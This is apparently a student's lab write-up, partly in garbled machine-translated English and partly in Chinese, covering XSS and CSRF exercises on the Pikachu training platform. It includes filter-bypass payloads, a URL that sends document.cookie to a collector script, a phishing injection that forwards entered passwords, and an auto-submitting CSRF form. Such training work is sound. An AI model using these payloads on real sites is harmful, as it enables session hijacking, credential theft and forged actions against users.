Xss generally script code, mainly JS, but there's AS and VBS.
It is divided into a reflective type, storage type, DOM type three categories.
In general, when the place of manual testing should first consider it is where there have input output.
Then the test is sensitive character, generally speaking will <> " '() &? Such a sensitive character test and then view the server has no defense or escape measures.
Is further inserted and the insertion of several HTML tags that are not closed tags. Filter and take a look at whether the HTML coding. Then you can also look at whether the filter is not closed.
Js code is then tested
<script> alert(123) </script>
Similarly prompt ah ah confirm or script src about internal test. Script is then tested to see whether the case of modifications to bypass.
Then look
<Scr <script> ipt> alert (123) </ scr </ script> ipt> doll game such a bypass filter See
There is emphasis filter <a href of. Look at the data and labels who are filtered.
If the data is not filtered to fill href = "javascript: alert (123)"> TEST </a> about whether JS
If the filter JS character, then it would try to bypass the sensitive about.
Then if you can bypass that test events to see if will not be filtered.
Events are filtered to see if it is black or white name names, some of the edge of EVENT test such as onclimbatree and so most people do not make use of the event. If you do not prove to be a blacklist filter, you can select some other events. There can be a lot of tests and bypass the place, but in itself is a matter between offense and defense. . . The strategy is very large so never finish.
XSS can be used to do many things. Cookie stealing is common to change the content, linked to horse redirect worm
The first is the reflex test XSS attacks to steal cookies
Try to get cookies function constructed
然后获取成功,生成的盗取COOKIES的URL是172.22.19.240/pikachu/vul/xss/xss_reflected_get.php?message=%3Cscript%3Edocument.location+%3D+%27http%3A%2F%2F172.22.19.240%2Fpikachu%2Fpkxss%2Fxcookie%2Fcookie.php%3Fcookie%3D%27+%2B+document.cookie%3B%3C%2Fscript%3E&submit=submit
反射性xss post
试了一下没有限制输入
修改了服务器的post.html文件,然后通过让对方访问我的http://172.22.19.240/pikachu/pkxss/xcookie/post.html就可以了
存储型xss
插一下看一看能不能插入js代码
弹窗成功
尝试使用钓鱼
插入js代码
输入密码后信息转给172.22.38.205\pikachu\pkxss\xfish\xfish.php发送给后台数据库
这板子应该是得重装才能第二次用了。
DOM型XSS
先测试一下有没有输入妨碍,发现
找得到,在这个位置。发现标签闭合问题。直接选择“>闭合前面的标签。然后可以后面再插入一个鼠标扫过触发'><img src="33" onmouseover="alert(222)">
但是在抓包过程中发现GET是没有发送参数的。
然后是DOM XSS x的
发现这个地方是进行传参的,就是说可以把这个URL发送给其他人让他们点击来执行代码'> <imgsrc="231" onmouseover=alert("222")>
发现能利用这个URL来使对方触发http://172.22.38.205/pikachu/vul/xss/xss_dom_x.php?text=%27%3E+%3Cimgsrc%3D%22231%22+onmouseover%3Dalert%28%22222%22%29%3E
盲打
首先尝试定位,发现搜不到,无法得到位置那就尝试直接闭合写
也没找到。。。进入后台发现
发现什么都没有。。。直接插入JS代码就可以了
XSS过滤
还是先定位+测试字符过滤
开始测试JS代码
<script>alert(1)</script>
全没了。套娃也不成,应该是过滤了<script那就看看几次过滤<scri<scriptpt>alert(1)</scr</scriptipt>
但是结果依然。套娃失败。但是发现是个垃圾过滤。直接<ScRiPt>alert(1)</ScRiPt>大小写玩法就给绕过了
看样子不是什么好过滤,那<a herf之类的估计也可以。
xss的HTML特殊字符
直接注
<ScRiPt>alert(1)</ScRiPt>
查看了一下
插了一下JS。直接成功
不过看了一下,貌似输入的字符很多都被转了。但是EVENT应该是可以触发的。
xss之href输出
因为提示是这个href输出,所以猜测一下里面是<a href
发现“被过滤了。。"'<>??&?/
那就是直接插入JS了javascript:alert(123)
依然可以
xss之js输出
依然是瞎写入AAAAAAAAAAAAAa<>'"?%&
然后定位了
发现在这个位置貌似也没过滤
先试着闭合一下然后注释后面
'</script><script>alert(123)</script> --
可以。
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
CSRF
CSRF(get)
那就先抓包看看GET发送的到底是个什么URL
GET /pikachu/vul/csrf/csrfget/csrf_get_edit.php?sex=yuanziyin&phonenum=110&add=earth&email=yingyingying&submit=submit这个是传递的URL。发现在参数内貌似没有账号相关。
那就直接URL构成172.22.38.205//pikachu/vul/csrf/csrfget/csrf_get_edit.php?sex=yuanziyin&phonenum=110&add=earth&email=yingyingying&submit=submit点就完事了
CSRF之post
这个也是一样构成一个POST文件123.html就可以了。。
构成了一个用来post的HTML文件直接访问http://172.22.38.205/pikachu/123.html
123.html
<html>
<head>
<script>
window.onload = function() {
document.getElementById("postsubmit").click();
}
</script>
</head>
<body>
<form method="post" action="http://172.22.38.205/pikachu/vul/csrf/csrfpost/csrf_post_edit.php">
<input id="sex" type="text" name="sex" value="yuanziyin" />
<input id="phonenum" type="text" name="phonenum" value="110" />
<input id="add" type="text" name="add" value="nvzhuang" />
<input id="email" type="text" name="email" value="zainance" />
<input id="postsubmit" type="submit" name="submit" value="submit" />
</form>
</body>
</html>
然后就
CSRF 之TOKEN防御
TOKEN防御的问题就在于TOKEN够不够难
首先测试了一下是GET的方式。
不过这个难度比较大。。因为CSRF的TOKEN更新机制有关,比较麻烦,防范策略比较多,1分钟刷新一次或者一个网页一个TOKEN这种基本打不了。
但是实际上还有的TOKEN是不变或者是每次登入到登出都不变的就可以恶心恶心他了。可以打组合拳。XSS+CSRF有概率成功。这个还是不太好的策略,不过打比较弱的是可以的。